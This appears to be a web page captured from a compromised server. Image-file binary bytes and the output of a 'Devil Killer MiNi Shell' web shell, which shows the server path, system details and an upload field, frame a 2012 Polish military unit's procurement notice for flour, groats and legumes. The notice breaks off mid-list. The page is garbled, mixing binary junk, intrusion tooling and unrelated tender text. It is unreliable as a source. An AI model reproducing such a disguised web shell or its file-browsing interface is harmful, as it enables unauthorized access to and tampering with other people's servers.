JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120814/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120814/174917-N-2012.html

<p class="kh_header"><b>Kraków: Dostawa przetworów zbożowych, strączkowych i ziemniaczanych</b><br>
<b>Numer ogłoszenia: 174917 - 2012; data zamieszczenia: 14.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 4228 , ul. Montelupich 3, 30-901 Kraków, woj. małopolskie, tel. 12 455 75 53, faks 12 455 75 53.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa przetworów zbożowych, strączkowych i ziemniaczanych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje przetwory zbożowe, strączkowe i ziemniaczane, których asortyment obejmuje 12 pozycji dostarczanych do 7 obszarów rejonu zaopatrywania Jednostki Wojskowej 4228.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.61.33.00-1, 15.61.33.15-5, 03.21.22.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Każdy wykonawca przystępujący do przetargu obowiązany jest wnieść wadium przed  upływem terminu składania ofert tj. do dnia 19.09.2012 r. do godz. 11, w wysokości: 
  dla zadania nr 1 -           390,00 zł
 dla zadania nr 2 -        175,00 zł
dla zadania nr 3 -        230,00 zł
dla zadania nr 4 -        330,00 zł
dla zadania nr 5 -        420,00 zł
dla zadania nr 6 -        300,00 zł
dla zadania nr 7 -        285,00 zł
2.	Wadium może być wnoszone w jednej lub kilku następujących formach:
a)	w pieniądzu;
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-
             kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2  
             ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsię-
             biorczości (Dz.U. Nr 109, poz. 1158 z późn. zm.).
3.	Termin wniesienia wadium upływa dnia 19.09.2012 r. o godz. 11
4.	W przypadku, gdy wykonawca wnosi wadium w formie gwarancji bankowej lub gwarancji ubezpieczeniowej z treści tych gwarancji musi w szczególności jednoznacznie wynikać:
a)	zobowiązanie gwaranta (np. banku, zakładu ubezpieczeń) do zapłaty całej kwoty nieodwołalnie i bezwarunkowo na pierwsze żądanie zamawiającego (beneficjenta gwarancji) zawierające oświadczenie zamawiającego, że zaistniały okoliczności, o których mowa w rozdziale X, pkt. 9 i 10 niniejszej specyfikacji, bez konieczności potwierdzania tych okoliczności przez wykonawcę i składania jakichkolwiek dodatkowych oświadczeń, dokumentów lub dokonania czynności przez wykonawcę lub osoby trzecie, bez pośrednictwa banku korespondenta lub innej tego typu instytucji.
b)	zobowiązanie gwaranta do zapłaty żądanej kwoty niezwłocznie po otrzymaniu stosownego wezwania do zapłaty od zamawiającego, w terminie nie dłuższym 
niż 14 dni.
c)	kwota, jaką gwarant zobowiązuje się wypłacić zamawiającemu (beneficjentowi gwarancji) w przypadku zaistnienia okoliczności uzasadniających zatrzymanie wadium, z zastrzeżeniem, że nie może być ona niższa niż kwota (w zależności od zadania) określona w rozdziale X, pkt. 1 niniejszej specyfikacji.
d)	że zobowiązaniem gwaranta do wypłaty objęte są wszystkie przypadki zatrzymania wadium określone w ustawie Prawo zamówień publicznych.
5. Wadium, wnoszone w pieniądzu wykonawca wpłaca przelewem na konto Jednostki 
     Wojskowej 4228 w Krakowie nr:
     Bank NBP OO KRAKÓW
                                          Nr konta: 70 1010 1270 0052 1013 9120 0000
     z dopiskiem: wadium - dostawa przetworów zbożowych, strączkowe i ziemniaczanych, zadanie nr:,   sprawa nr 101-2012
Wniesienie wadium w formie pieniężnej uważa się za skuteczne, jeżeli w dniu składania 
ofert do godziny 11 środki pieniężne znajdują się na rachunku bankowym zamawiają-
cego.
W przypadku pozostałych form wnoszenia wadium, oryginały należy deponować w kasie 
JW 4228 mieszczącej się w budynku nr 3 pokój nr 12.
Godziny otwarcia kasy:  od poniedziałku - do piątku od 11-12.
(o ile jest to możliwe zamawiający prosi o dołączenie do oferty kserokopii przelewu lub innego dokumentu potwierdzającego wniesienie wadium).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnianie warunków określane będzie za pomocą reguły - spełnia - nie spełnia na podstawie oświadczeń i dokumentów złożonych przez wykonawcę</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnianie warunków określane będzie za pomocą reguły - spełnia - nie spełnia na podstawie oświadczeń i dokumentów złożonych przez wykonawcę
w szczególności a)	należytego wykonania umowy w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej dostawy której przedmiotem była dostawa ryb, o wartości nie mniejszej niż: 
dla zadania nr 1 -   20.500 zł
dla zadania nr 2 -     9.000 zł
dla zadania nr 3 -   12.000 zł
dla zadania nr 4 -   17.500 zł
dla zadania nr 5 -   22.000 zł
dla zadania nr 6 -   16.000 zł
dla zadania nr 7 -   15.000 zł</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnianie warunków określane będzie za pomocą reguły - spełnia - nie spełnia na podstawie oświadczeń i dokumentów złożonych przez wykonawcę</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnianie warunków określane będzie za pomocą reguły - spełnia - nie spełnia na podstawie oświadczeń i dokumentów złożonych przez wykonawcę</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnianie warunków określane będzie za pomocą reguły - spełnia - nie spełnia na podstawie oświadczeń i dokumentów złożonych przez wykonawcę w szczególności
1)	informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których
      wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków 
     finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 
     miesiące przed upływem terminu składania ofert; na kwotę nie mniejszą niż   
     (odpowiednio dla każdego zadania)
dla zadania nr 1 -   20.500 zł
dla zadania nr 2 -     9.000 zł
dla zadania nr 3 -   12.000 zł
dla zadania nr 4 -   17.500 zł
dla zadania nr 5 -   22.000 zł
dla zadania nr 6 -   16.000 zł
dla zadania nr 7 -   15.000 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a)	aktualną decyzję Powiatowego Lekarza Weterynarii o zatwierdzeniu zakładu do 
produkcji lub obrotu, określającą rodzaj i zakres działalności, lub decyzję  
Państwowego Powiatowego Inspektora Sanitarnego o zatwierdzeniu zakładu do  wprowadzania do obrotu produktów pochodzenia zwierzęcego, nieobjętego 
urzędową kontrolą organów Inspekcji Weterynaryjnej, określającą rodzaj i zakres 
działalności, 
   Podstawa prawna; ustawa z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i    
   żywienia (Dz. U. 2006 r., Nr 171 poz. 1225 z późn. zm.)

b)	aktualny dokument potwierdzający stosowanie wdrożonego systemu HACCP:
- Certyfikat HACCP, wystawiony przez niezależną, akredytowaną jednostkę    
     certyfikującą
        lub
        - zaświadczenie właściwego organu Państwowej Inspekcji Sanitarnej lub     
             właściwego organu Inspekcji Weterynaryjnej o sprawowaniu nadzoru nad 
             stosowaniem zasad wdrożonego systemu HACCP, wydane na podstawie art. 59 
             i art. 73. ust. 1 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności 
             i żywienia;
               lub
   - protokół z kontroli sanitarnej przeprowadzonej przez organy Państwowej Inspekcji    
      Sanitarnej, jako organ urzędowej kontroli żywności, w skład, którego wchodzi  
      punkt zawierający pozytywną ocenę opracowania, wdrożenia i utrzymania 
      systemu HACCP na podstawie art. 59 i art. 73. ust.1 ustawy z dnia 25 sierpnia 
      2006 r. o bezpieczeństwie żywności i żywienia;</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Prawidłowo wypełniony druk oferta
2. Prawidłowo wypełniony formularz cenowy
3.3.	Oryginał lub kopię pełnomocnictwa:
a)	dla osoby/osób podpisującej/cych ofertę do podejmowania zobowiązań w imieniu wykonawcy składającego ofertę, gdy prawo do podpisania oferty nie wynika z innych dokumentów do niej załączonych (np. z aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, odpisu z właściwego rejestru). 
b)	dla ustanowionego pełnomocnika, do reprezentowania w postępowaniu  albo do reprezentowania w postępowaniu i zawarcia umowy - dotyczy wykonawców wspólnie ubiegających się o udzielenie zamówienia. Zgodnie z art. 23 ust. 2 ustawy wykonawcy ubiegający się wspólnie o udzielenie zamówienia zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu i zawarcia umowy.
Wymagana jest forma, rodzaj i zakres pełnomocnictwa właściwy do poszczególnych czynności. W przypadku złożenia kopii pełnomocnictwa, musi być ona potwierdzona za zgodność z oryginałem notarialnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Na pisemny wniosek Zamawiającego dopuszcza się zmiany w ilościach poszczególnych towarów (środków spożywczych) określonych w ilościach zawartych w umowie przy zachowaniu następujących warunków:
1)	zmiana wynika z potrzeb odbiorców, których nie można było przewidzieć w chwili zawarcia umowy;
2)	zmiana nie powoduje przekroczenia maksymalnej wartości umowy brutto. 
2.	W przypadku zmiany wysokości stawki podatku od towarów i usług (VAT), na pisemny wniosek zainteresowanej strony, dopuszcza się zmianę wartości umowy brutto w stosunku do towarów, których zmiana dotyczy.
3.	Dopuszcza się waloryzację cen jednostkowych netto według wskaźnika cen towarów i usług konsumpcyjnych dla żywności i napojów bezalkoholowych opublikowanego przez Główny Urząd Statystyczny w Biuletynie Statystycznym GUS. Celem waloryzacji jest tylko i wyłącznie urealnienie cen zakupu przedmiotu niniejszej umowy.
4.	Waloryzacja jest dopuszczalna w razie łącznego spełnienia następujących warunków:
1)	złożenia pisemnego wniosku przez zainteresowaną stronę, przy czym każda ze stron ma prawo do  dwukrotnej waloryzacji na swoją korzyść;
2)	upływu pięciu miesięcy od rozpoczęcia realizacji umowy,
3)	zmiany wskaźnika przekraczającej 5 punktów procentowych 
5.	Waloryzację przeprowadza się w oparciu o otrzymane w formie pisemnej z GUS wskaźniki cen towarów i usług konsumpcyjnych - żywność i napoje bezalkoholowe, za miesiąc poprzedzający wpływ wniosku, o którym mowa powyżej, w odniesieniu do cen z grudnia 2012r. , dla odpowiednich grup żywności lub wybranych produktów.
6.	Zmiana cen wskutek waloryzacji wymaga formy pisemnej pod rygorem nieważności 
i wywołuje skutek od dnia podpisania stosownego aneksu do umowy, który powinien zostać podpisany w terminie do 30 dni od daty otrzymania przez Zamawiającego stosownej informacji z GUS. W przypadku gdy Wykonawca wraz z wnioskiem do Zamawiającego przedłoży prawidłową informację z GUS, sporządzoną w formie pisemnej, dopuszcza się dokonanie waloryzacji na podstawie takowej informacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zamowienia.3rblog.wp.mil.pl    oraz    www.przetargi.army.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 4228
30-901 Kraków ul. Montelupich 3
Sekcja Zamówień Publicznych
budynek nr 28.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.09.2012 godzina 11:00, miejsce: Jednostka Wojskowa 4228
30-901 Kraków ul. Montelupich 3
Kancelaria Jawna
budynek nr 28.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa do obszaru I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mąka pszenna typ 500 - 2000 kg
Mąka ziemniaczana - 200 kg
Kasza manna - 300 kg
Płatki owsiane - 300 kg
Płatki kukurydziane - 300 kg
Musli jabłkowe - 200 kg
Musli truskawkowe - 200 kg
Musli morelowe - 200 kg
Fasola biała jednolita - 1000 kg
Fasola biała Jaś karłowy - 800 kg
Groch obłuskany cały - 800 kg
Groch obłuskany połówki 2000 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.33.00-1, 15.61.33.13-5, 03.21.22.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa do obszaru II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mąka pszenna typ 500 - 1450 kg
Mąka ziemniaczana - 65 kg
Kasza manna - 30 kg
Płatki kukurydziane - 40 kg
Musli jabłkowe - 20 kg
Musli truskawkowe - 20 kg
Musli morelowe - 20 kg
Fasola biała jednolita - 450 kg
Fasola biała Jaś karłowy - 650 kg
Groch obłuskany cały - 300 kg
Groch obłuskany połówki - 500 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.33.00-1, 15.61.33.13-5, 03.21.22.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa do obszaru III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mąka pszenna typ 500 - 1480 kg
Mąka ziemniaczana - 50 kg
Kasza manna - 400 kg
Płatki owsiane - 200 kg
Płatki kukurydziane - 340 kg
Musli jabłkowe - 205 kg
Musli truskawkowe - 205 kg
Musli morelowe - 205 kg
Fasola biała jednolita - 460 kg
Fasola biała Jaś karłowy - 460 kg
Groch obłuskany cały -410 kg
Groch obłuskany połówki - 410 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.33.00-1, 15.61.33.13-5, 03.21.22.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa dla obszaru IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mąka pszenna typ 500 - 3950 kg
Mąka ziemniaczana - 230 kg
Kasza manna - 340 kg
Płatki owsiane - 320 kg
Płatki kukurydziane - 680 kg
Musli jabłkowe - 250 kg
Musli truskawkowe - 250 kg
Musli morelowe - 250 kg
Fasola biała jednolita -800 kg
Fasola biała Jaś karłowy - 250 kg
Groch obłuskany cały - 500 kg
Groch obłuskany połówki - 450 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.33.00-1, 15.61.33.13-5, 03.21.33.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa dla obszaru V.</p>
